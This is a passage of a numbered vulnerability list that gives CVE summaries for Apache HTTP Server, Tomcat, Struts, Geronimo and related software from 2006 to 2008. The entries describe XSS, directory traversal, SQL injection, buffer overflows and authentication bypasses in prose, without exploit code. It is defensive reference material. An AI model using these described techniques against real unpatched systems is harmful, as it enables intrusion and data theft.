6353| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
6354| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
6355| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
6356| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
6357| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
6358| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
6359| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
6360| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
6361| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
6362| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
6363| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
6364| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
6365| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
6366| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
6367| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
6368| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
6369| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
6370| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
6371| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
6372| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
6373| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
6374| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
6375| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
6376| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
6377| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
6378| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
6379| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
6380| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
6381| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
6382| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
6383| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
6384| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
6385| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6386| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
6387| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
6388| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
6389| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
6390| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
6391| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
6392| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
6393| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
6394| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
6395| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
6396| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
6397| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
6398| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
6399| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6400| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
6401| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
6402| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
6403| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
6404| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
6405| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
6406| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
6407| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
6408| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
6409| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
6410| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
6411| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
6412| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
6413| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
6414| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
6415| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
6416| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
6417| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
6418| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
6419| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
6420| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
6421| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
6422| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
6423| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
6424| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
6425| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
6426| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
6427| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
6428| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
6429| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
6430| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
6431| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
6432| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
6433| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
6434| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
6435| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
6436| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
6437| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
6438| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
6439| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
6440| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
6441| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
6442| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
6443| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
6444| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
6445| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
6446| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
6447| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
6448| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
6449| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
6450| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
6451| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
6452| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
6453| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
6454| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
6455| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
6456| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
6457| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
6458| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
6459| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
6460| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
6461| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
6462| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
